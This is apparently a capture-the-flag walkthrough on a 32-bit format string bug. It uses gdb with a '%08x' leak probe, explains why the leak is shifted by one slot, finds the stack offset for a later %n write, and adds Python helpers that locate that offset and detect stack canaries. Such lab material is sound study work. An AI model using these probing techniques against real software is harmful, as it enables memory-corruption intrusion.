format string 3 (beginner): Solving problem (B)
Let's solve problem (B).
Well, first I want to test whether it is true that the output of printf("%08x.%08x....") follows on from printf's own esp, i.e. that the dwords it prints are the ones sitting above esp at the time of the call.
    0x0804850c <+136>:  lea    eax,[esp+0x2c]
    0x08048510 <+140>:  mov    DWORD PTR [esp],eax
    0x08048513 <+143>:  call   0x8048398 <printf@plt>      ; printf(text)
    0x08048518 <+148>:  mov    DWORD PTR [esp],0x8048649
    0x0804851f <+155>:  call   0x80483a8 <puts@plt>
    0x08048524 <+160>:  mov    ecx,DWORD PTR ds:0x804a020
    0x0804852a <+166>:  mov    edx,DWORD PTR ds:0x804a020
    (gdb) b *main+143
    Note: breakpoint 1 also set at pc 0x8048513.
    Breakpoint 2 at 0x8048513: file fmt_vuln.c, line 20.
    (gdb) r $(python -c 'print "%08x."*30')
    Starting program: /root/ctf/fmt_vuln $(python -c 'print "%08x."*30')
    True Text
    %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
    False Text

    Breakpoint 1, 0x08048513 in main (argc=2, argv=0xbffff434) at fmt_vuln.c:20
    20        printf(text);
    (gdb) i r $esp
    esp            0xbfffef50       0xbfffef50
    (gdb) ni
    22        puts("");
    (gdb)
    0x0804851f      22        puts("");
    (gdb) x/10xw $esp
    0xbfffef50:     0x08048649      0xbffff5b9      0x00154d7c      0x00154d7c
    0xbfffef60:     0x00154d7c      0x000000f0      0x000000f0      0xbffff434
    0xbfffef70:     0x00000004      0x00000004
    (gdb) ni
    bffff5b9.00154d7c.00154d7c.00154d7c.000000f0.000000f0.bffff434.00000004.00000004.00000174.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.
I want you to notice the difference between
>>0xbfffef50: 0x08048649 0xbffff5b9 0x00154d7c 0x00154d7c
and
>>bffff5b9.00154d7c.00154d7c.00154d7c.000000f0
I mean, the memory dump is shifted by one slot compared with what printf printed!
At first I could not understand this. And what does "0x08048649" mean?
Looking at the disassembly again, though, both things are explained by the listing itself. The first %08x does not print [esp] but [esp+4]: on 32-bit x86 the word at [esp] is printf's first argument, the pointer to the format string (text, stored there by the lea/mov pair at +136/+140), and the variadic arguments that %08x consumes begin at [esp+4]. So the leak starts at 0xbffff5b9, the second dword of the dump, and the N-th %08x shows the dword at esp+4*N. As for 0x08048649: the two ni commands stepped over the call to printf and then over mov DWORD PTR [esp],0x8048649, so by the time of x/10xw the argument slot had already been overwritten with the address of the "" literal passed to puts. It is not something printf left behind. A useful consequence: the 11th %08x prints 78383025, which is "%08x" read little-endian, i.e. the start of the format string itself, and 4*11 = 0x2c is exactly the displacement in lea eax,[esp+0x2c]. The format string is therefore the 11th stack argument, which is the offset you need for a %n write later.
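As an added example (my own helper, not code from the original post), here is a small Python script that mechanises the check above: it rebuilds the probe string, parses the leaked dwords, finds the argument index at which the format string's own bytes appear, and converts that index back to a stack address to compare with the lea eax,[esp+0x2c] in the disassembly. It assumes the 32-bit x86 cdecl layout described above (format pointer at [esp], first vararg at [esp+4]) and uses the leak from the gdb session as its constructed input.

```python
# Added example, not from the original post: locate a format string's own
# buffer among printf's stack arguments on 32-bit x86 from the "%08x."
# probe output.  Assumption: cdecl layout, format pointer at [esp] and
# the N-th %08x printing the dword at esp + 4*N.
import re
import struct

# Constructed input: esp at the printf call and the 30-word leak from the
# gdb session above.
ESP_AT_CALL = 0xBFFFEF50
LEAK = ("bffff5b9.00154d7c.00154d7c.00154d7c.000000f0.000000f0.bffff434."
        "00000004.00000004.00000174.78383025.3830252e.30252e78.252e7838."
        "2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025."
        "3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78."
        "252e7838.2e783830.")


def probe(n=30):
    """The same probe the post passes on the command line: "%08x." * n."""
    return "%08x." * n


def parse_leak(text):
    """Turn 'xxxxxxxx.yyyyyyyy.' into a list of 32-bit integers."""
    return [int(w, 16) for w in re.findall(r"[0-9a-f]{8}", text)]


def find_format_offset(words, fmt):
    """Return the 1-based argument index whose dword equals the first four
    bytes of the format string as they sit in memory (little-endian), or
    None.  For "%08x." the marker is b"%08x" == 0x78383025."""
    marker = struct.unpack("<I", fmt[:4].encode())[0]
    for index, word in enumerate(words, start=1):
        if word == marker:
            return index
    return None


def arg_address(esp, index):
    """Stack address the index-th %08x reads from: esp + 4*index."""
    return esp + 4 * index


def lea_disp_to_index(disp):
    """Argument index of a buffer at [esp+disp] (disp from the lea)."""
    return disp // 4


def decode_word(word):
    """Show a leaked dword as the four bytes it occupies in memory."""
    return struct.pack("<I", word)


if __name__ == "__main__":
    words = parse_leak(LEAK)
    idx = find_format_offset(words, probe())
    print("format string is argument #%d at 0x%08x (lea says #%d)"
          % (idx, arg_address(ESP_AT_CALL, idx), lea_disp_to_index(0x2C)))
    print("dwords 11-12 decode to", decode_word(words[10]), decode_word(words[11]))
```

To use it against a different binary, replace LEAK with the program's output and ESP_AT_CALL with the value from i r $esp at the call; if the marker is not found within the probe length, lengthen the probe rather than guessing an offset. Padding the probe with a distinctive prefix such as "AAAA" works the same way, only the marker changes.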
Well, first I have to read the source code and understand which mitigations the problem has in place to get in the way of solving it. The first mitigation is randomized program addresses (-pie): PIE loads the executable at a random memory address so that the kernel can disallow text relocation. I want to read this blog after reading the source. Next, we have to be careful about the protected stack (-fstack-protector-all), i.e. a stack canary; I will use this reference (site). IPA is God. The next mitigation is a read-only GOT (-Wl,-z,relro,-z,now): with full RELRO we cannot use a GOT-overwrite exploit, so, looked at the other way round, the possibilities shrink. The last one is that ASCII armor is enabled: shared libraries are mapped at addresses containing a NUL byte, so their addresses cannot be copied into a buffer by string functions. Let's check these in the disassembly:
    % objdump -d -M intel villager|grep -A40 main.:
    000008b0 <main>:
     8b0:   55                      push   ebp
     8b1:   89 e5                   mov    ebp,esp
     8b3:   83 e4 f0                and    esp,0xfffffff0
     8b6:   83 ec 20                sub    esp,0x20
     8b9:   65 a1 14 00 00 00       mov    eax,gs:0x14
     8bf:   89 44 24 1c             mov    DWORD PTR [esp+0x1c],eax
     8c3:   31 c0                   xor    eax,eax
     8c5:   c7 04 24 2c 0a 00 00    mov    DWORD PTR [esp],0xa2c
     8cc:   e8 fc ff ff ff          call   8cd <main+0x1d>
     8d1:   a1 00 00 00 00          mov    eax,ds:0x0
     8d6:   89 04 24                mov    DWORD PTR [esp],eax
     8d9:   e8 fc ff ff ff          call   8da <main+0x2a>
     8de:   66 90                   xchg   ax,ax
     8e0:   c7 04 24 03 00 00 00    mov    DWORD PTR [esp],0x3
     8e7:   e8 fc ff ff ff          call   8e8 <main+0x38>
     8ec:   e8 ff fe ff ff          call   7f0 <_Z4convv>
     8f1:   84 c0                   test   al,al
     8f3:   74 eb                   je     8e0 <main+0x30>
     8f5:   c7 04 24 34 0a 00 00    mov    DWORD PTR [esp],0xa34
     8fc:   e8 fc ff ff ff          call   8fd <main+0x4d>
     901:   a1 00 00 00 00          mov    eax,ds:0x0
     906:   89 04 24                mov    DWORD PTR [esp],eax
     909:   e8 fc ff ff ff          call   90a <main+0x5a>
     90e:   31 c0                   xor    eax,eax
     910:   8b 54 24 1c             mov    edx,DWORD PTR [esp+0x1c]
     914:   65 33 15 14 00 00 00    xor    edx,DWORD PTR gs:0x14
     91b:   75 02                   jne    91f <main+0x6f>
     91d:   c9                      leave
     91e:   c3                      ret
     91f:   90                      nop
     920:   e8 fc ff ff ff          call   921 <main+0x71>
OK, I'll try splitting the disassembly into pieces so that anyone can read it.
1. These are the function prologue and epilogue, so we can mostly ignore them.
I'd direct your attention to sub esp,0x20: it means the local variables of this function occupy 0x20 (32) bytes of the stack frame.
     8b0:   55                      push   ebp
     8b1:   89 e5                   mov    ebp,esp
     8b3:   83 e4 f0                and    esp,0xfffffff0
     8b6:   83 ec 20                sub    esp,0x20
     ...omission...
     91d:   c9                      leave
     91e:   c3                      ret
     91f:   90                      nop
     920:   e8 fc ff ff ff          call   921 <main+0x71>
2.
     8b9:   65 a1 14 00 00 00       mov    eax,gs:0x14
     8bf:   89 44 24 1c             mov    DWORD PTR [esp+0x1c],eax
     8c3:   31 c0                   xor    eax,eax
     8c5:   c7 04 24 2c 0a 00 00    mov    DWORD PTR [esp],0xa2c
     8cc:   e8 fc ff ff ff          call   8cd <main+0x1d>
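As an added example (my own helper, not code from the post), here is a Python script that scans objdump -M intel text for the -fstack-protector pattern visible in the main listing: the canary load from gs:0x14 into a frame slot in the prologue, and the reload/xor/jne check before leave that branches to the __stack_chk_fail call. It assumes glibc's i386 convention of keeping the canary at gs:0x14 and uses the relevant lines of the villager disassembly above as constructed input; it reports the slot the canary lives in and the address the failing check jumps to, which is what you need to know before deciding whether a stack overwrite is even worth attempting.

```python
# Added example, not from the original post: detect the i386
# stack-protector pattern in objdump -M intel output.  Assumption: the
# canary is read from gs:0x14 (glibc on 32-bit x86), stored to a frame
# slot in the prologue, and re-checked with xor/jne before leave.
import re

# Constructed sample: the relevant lines of the villager main listing.
OBJDUMP_MAIN = """
 8b6:   83 ec 20                sub    esp,0x20
 8b9:   65 a1 14 00 00 00       mov    eax,gs:0x14
 8bf:   89 44 24 1c             mov    DWORD PTR [esp+0x1c],eax
 8c3:   31 c0                   xor    eax,eax
 90e:   31 c0                   xor    eax,eax
 910:   8b 54 24 1c             mov    edx,DWORD PTR [esp+0x1c]
 914:   65 33 15 14 00 00 00    xor    edx,DWORD PTR gs:0x14
 91b:   75 02                   jne    91f <main+0x6f>
 91d:   c9                      leave
 91e:   c3                      ret
 91f:   90                      nop
 920:   e8 fc ff ff ff          call   921 <main+0x71>
"""

# address: bytes... mnemonic operands
LINE_RE = re.compile(r"^\s*([0-9a-f]+):\s+((?:[0-9a-f]{2}\s)+)\s*(\S+)\s*(.*)$")


def parse_objdump(text):
    """Return a list of (address, mnemonic, operands) from objdump lines."""
    insns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            insns.append((int(m.group(1), 16), m.group(3), m.group(4).strip()))
    return insns


def find_canary(insns, canary_src="gs:0x14"):
    """Locate the canary store and the epilogue check.

    Returns a dict: 'slot' is the frame slot holding the canary (e.g.
    '[esp+0x1c]'), 'store_at' the address of that store, 'check_at' the
    address of the xor against gs:0x14, 'fail_at' the jne target (the
    __stack_chk_fail call), and 'reload_matches' whether the check reads
    back the same slot the prologue wrote.  Missing parts stay None."""
    result = {"slot": None, "store_at": None, "check_at": None,
              "fail_at": None, "reload_matches": None}
    for i, (addr, mnem, ops) in enumerate(insns):
        nxt = insns[i + 1] if i + 1 < len(insns) else None
        prev = insns[i - 1] if i > 0 else None
        # prologue: mov eax,gs:0x14 ; mov DWORD PTR [esp+X],eax
        if mnem == "mov" and ops == "eax," + canary_src and nxt:
            m = re.match(r"DWORD PTR (\[[^\]]+\]),eax$", nxt[2])
            if nxt[1] == "mov" and m:
                result["slot"] = m.group(1)
                result["store_at"] = nxt[0]
        # epilogue: mov edx,DWORD PTR [slot] ; xor edx,DWORD PTR gs:0x14 ; jne fail
        if mnem == "xor" and ops == "edx,DWORD PTR " + canary_src and nxt:
            if nxt[1] == "jne":
                result["check_at"] = addr
                result["fail_at"] = int(nxt[2].split()[0], 16)
                if prev and result["slot"]:
                    result["reload_matches"] = (
                        prev[1] == "mov"
                        and prev[2] == "edx,DWORD PTR " + result["slot"])
    return result


def has_stack_protector(insns):
    """True only when both the store and a matching check are present."""
    r = find_canary(insns)
    return r["slot"] is not None and r["check_at"] is not None and bool(r["reload_matches"])


if __name__ == "__main__":
    report = find_canary(parse_objdump(OBJDUMP_MAIN))
    for key, value in report.items():
        print("%-15s %s" % (key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value))
```

Run it on the full output of objdump -d -M intel for a function and it tells you where in the frame the canary sits (here [esp+0x1c], the top of the 0x20-byte local area, just below the saved ebp), so any overflow of a local buffer that reaches the return address must cross it. The pattern is compiler-specific; a function compiled with a different register allocation (ecx instead of edx, for instance) needs the operand strings adjusted.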